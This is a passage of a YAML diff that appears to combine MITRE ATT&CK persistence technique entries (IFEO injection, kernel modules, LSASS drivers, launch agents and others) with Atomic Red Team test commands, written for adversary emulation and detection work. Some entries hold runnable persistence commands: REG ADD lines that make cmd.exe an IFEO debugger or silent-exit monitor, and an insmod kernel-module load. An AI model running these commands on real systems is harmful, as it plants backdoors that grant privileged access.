Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_detection: |- + Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. 
Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. + + Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. + + Monitor for changes to environment variables, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + + Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. 
+ x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1062: + technique: + id: attack-pattern--4be89c7c-ace6-4876-9377-c8d54cef3d63 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hypervisor + description: |- + **This technique has been deprecated and should no longer be used.** + + A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption. + external_references: + - source_name: mitre-attack + external_id: T1062 + url: https://attack.mitre.org/techniques/T1062 + - external_id: CAPEC-552 + source_name: capec + url: https://capec.mitre.org/data/definitions/552.html + - url: https://en.wikipedia.org/wiki/Hypervisor + description: Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016. + source_name: Wikipedia Hypervisor + - url: http://en.wikipedia.org/wiki/Xen + description: Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014. + source_name: Wikipedia Xen + - url: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf + description: Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted + Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014. + source_name: Myers 2007 + - url: http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html + description: virtualization.info. 
(Interviewer) & Liguori, A. (Interviewee). + (2006, August 11). Debunking Blue Pill myth [Interview transcript]. + Retrieved November 13, 2014. + source_name: virtualization.info 2006 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-30T13:44:04.712Z' + created: '2017-05-31T21:30:50.958Z' + x_mitre_deprecated: true + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: 'Type-1 hypervisors may be detected by performing timing + analysis. Hypervisors emulate certain CPU instructions that would normally + be executed by the hardware. If an instruction takes orders of magnitude longer + to execute than normal on a system that should not contain a hypervisor, one + may be present. (Citation: virtualization.info 2006)' + x_mitre_version: '2.0' + atomic_tests: [] + T1546.012: + technique: + created: '2020-01-24T15:05:58.384Z' + modified: '2020-11-10T18:29:31.112Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6 + description: |- + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) + + IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. 
(Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) + + IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) + + Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + + Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. 
+ + Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) + name: Image File Execution Options Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.012 + url: https://attack.mitre.org/techniques/T1546/012 + - url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ + description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). + Retrieved December 18, 2017. + source_name: Microsoft Dev Blog IFEO Mar 2010 + - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview + description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December + 18, 2017. + source_name: Microsoft GFlags Mar 2017 + - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit + description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent + Process Exit. Retrieved June 27, 2018. + source_name: Microsoft Silent Process Exit NOV 2017 + - url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ + description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image + File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. + source_name: Oddvar Moe IFEO APR 2018 + - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ + description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. + Retrieved November 12, 2014. 
+ source_name: Tilbury 2014 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml + description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. + Retrieved December 18, 2017. + source_name: FSecure Hupigon + - url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 + description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December + 18, 2017. + source_name: Symantec Ushedix June 2008 + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Oddvar Moe, @oddvarmoe + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) + + Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. 
(Citation: Elastic Process Injection July 2017) + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1546.012 + atomic_tests: + - name: IFEO Add Debugger + auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 + description: 'Leverage Global Flags Settings + +' + supported_platforms: + - windows + input_arguments: + target_binary: + description: Binary To Attach To + type: Path + default: C:\Windows\System32\calc.exe + payload_binary: + description: Binary To Execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" + +' + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger + /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: IFEO Global Flags + auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + description: 'Leverage Global Flags Settings + +' + supported_platforms: + - windows + input_arguments: + target_binary: + description: Binary To Attach To + type: Path + default: C:\Windows\System32\notepad.exe + payload_binary: + description: Binary To Execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: | + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" + cleanup_command: | + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f 
>nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 + name: command_prompt + elevation_required: true + T1525: + technique: + external_references: + - source_name: mitre-attack + external_id: T1525 + url: https://attack.mitre.org/techniques/T1525 + - source_name: Rhino Labs Cloud Image Backdoor Technique Sept 2019 + url: https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/ + description: Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the + Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019. + - source_name: Rhino Labs Cloud Backdoor September 2019 + url: https://github.com/RhinoSecurityLabs/ccat + description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). + Retrieved September 12, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Implant Internal Image + description: |- + Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. 
Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) + + A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) + id: attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-12T18:28:27.948Z' + created: '2019-09-04T12:04:03.552Z' + x_mitre_is_subtechnique: false + x_mitre_data_sources: + - 'Image: Image Creation' + - 'Image: Image Modification' + x_mitre_detection: "Monitor interactions with images and containers by users + to identify ones that are added or modified anomalously.\n\nIn containerized + environments, changes may be detectable by monitoring the Docker daemon logs + or setting up and monitoring Kubernetes audit logs depending on registry configuration. " + x_mitre_permissions_required: + - User + x_mitre_version: '2.0' + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee + - Praetorian + x_mitre_platforms: + - IaaS + - Containers + atomic_tests: [] + T1547.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.006 + url: https://attack.mitre.org/techniques/T1547/006 + - source_name: Linux Kernel Programming + url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf + description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel + Module Programming Guide. Retrieved April 6, 2018. 
+ - url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html + description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. + Retrieved April 6, 2018. + source_name: Linux Kernel Module Programming Guide + - url: http://www.megasecurity.org/papers/Rootkits.pdf + description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved + April 6, 2018. + source_name: iDefense Rootkit Overview + - source_name: Apple Kernel Extension Deprecation + url: https://developer.apple.com/support/kernel-extensions/ + description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension + Alternatives. Retrieved November 4, 2020. + - url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html + description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility + to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.' + source_name: Volatility Phalanx2 + - url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ + description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. + Retrieved December 21, 2017. + source_name: CrowdStrike Linux Rootkit + - url: https://github.com/f0rb1dd3n/Reptile + description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved + April 9, 2018. + source_name: GitHub Reptile + - url: https://github.com/m0nad/Diamorphine + description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux + Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. + source_name: GitHub Diamorphine + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. + Retrieved April 6, 2018. + source_name: RSAC 2015 San Francisco Patrick Wardle + - url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ + description: Wardle, P. (2017, September 8). 
High Sierra’s ‘Secure Kernel + Extension Loading’ is Broken. Retrieved April 6, 2018. + source_name: Synack Secure Kernel Extension Broken + - url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ + description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble + your MacOS spy. Retrieved April 6, 2018.' + source_name: Securelist Ventir + - source_name: Trend Micro Skidmap + url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ + description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux + Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. + Retrieved June 4, 2020. + - url: http://tldp.org/HOWTO/Module-HOWTO/x197.html + description: Henderson, B. (2006, September 24). How To Insert And Remove + LKMs. Retrieved April 9, 2018. + source_name: Linux Loadable Kernel Module Insert and Remove LKMs + - url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux + description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved + April 9, 2018. + source_name: Wikipedia Loadable Kernel Module + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Kernel Modules and Extensions + description: |- + Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. 
(Citation: Linux Kernel Programming)  + + When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) + + Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) + + Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. 
(Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) + id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-03-30T00:59:53.716Z' + created: '2020-01-24T17:42:23.339Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - root + x_mitre_detection: |- + Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) + + For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. + + Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. 
On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Creation' + - 'Kernel: Kernel Module Load' + x_mitre_contributors: + - Wayne Silva, F-Secure Countercept + - Anastasios Pingios + - Jeremy Galloway + - Red Canary + x_mitre_platforms: + - macOS + - Linux + identifier: T1547.006 + atomic_tests: + - name: Linux - Load Kernel Module via insmod + auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 + description: 'This test uses the insmod command to load a kernel module for + Linux. + +' + supported_platforms: + - linux + input_arguments: + module_name: + description: Name of the kernel module name. + type: string + default: T1547006 + module_path: + description: Folder used to store the module. + type: path + default: "/tmp/T1547.006/T1547006.ko" + temp_folder: + description: Temp folder used to compile the code. + type: path + default: "/tmp/T1547.006" + module_source_path: + description: Path to download Gsecdump binary file + type: url + default: PathToAtomicsFolder/T1547.006/src + dependency_executor_name: bash + dependencies: + - description: 'The kernel module must exist on disk at specified location + +' + prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; + +' + get_prereq_command: | + if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; + cp #{module_source_path}/* #{temp_folder}/ + cd #{temp_folder}; make + if [ ! 
-f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi; + executor: + command: 'sudo insmod #{module_path} + +' + cleanup_command: | + sudo rmmod #{module_name} + [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} + name: bash + elevation_required: true + T1546.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.006 + url: https://attack.mitre.org/techniques/T1546/006 + - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf + description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved + July 10, 2017. + source_name: Writing Bad Malware for OSX + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: LC_LOAD_DYLIB Addition + description: |- + Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. + + Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. 
Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) + id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-30T00:51:58.454Z' + created: '2020-01-24T14:21:52.750Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor processes for those that may be used to modify binary + headers. Monitor file systems for changes to application binaries and invalid + checksums/signatures. Changes to binaries that do not line up with application + updates or patches are also extremely suspicious. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_platforms: + - macOS + atomic_tests: [] + T1547.008: + technique: + created: '2020-01-24T18:38:55.801Z' + modified: '2020-03-25T16:52:26.567Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4 + description: |- + Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. 
The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) + + Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. + name: LSASS Driver + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.008 + url: https://attack.mitre.org/techniques/T1547/008 + - url: https://technet.microsoft.com/library/cc961760.aspx + description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved + November 27, 2017. + source_name: Microsoft Security Subsystem + - url: https://technet.microsoft.com/library/dn408187.aspx + description: Microsoft. (2014, March 12). Configuring Additional LSA Protection. + Retrieved November 27, 2017. + source_name: Microsoft LSA Protection Mar 2014 + - url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx + description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November + 27, 2017. + source_name: Microsoft DLL Security + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Vincent Le Toux + x_mitre_data_sources: + - 'Module: Module Load' + - 'Driver: Driver Load' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events + 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: + Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. + (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc + utility (Citation: TechNet Autoruns) to examine loaded drivers associated + with the LSA. " + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1543.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543.001 + url: https://attack.mitre.org/techniques/T1543/001 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ + description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware + is hungry for credentials. Retrieved July 3, 2017. + source_name: OSX Keydnap malware + - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ + description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated + code. Retrieved July 5, 2017. + source_name: Antiquated Mac Malware + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. 
+ source_name: OSX.Dok Malware + - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ + description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). + Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. + source_name: Sofacy Komplex Trojan + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + - url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update + description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application + Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. + source_name: OceanLotus for OS X + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launch Agent + description: "Adversaries may create or modify launch agents to repeatedly execute + malicious payloads as part of persistence. Per Apple’s developer documentation, + when a user logs in, a per-user launchd process is started which loads the + parameters for each launch-on-demand user agent from the property list (plist) + files found in /System/Library/LaunchAgents, /Library/LaunchAgents, + and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent + Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). 
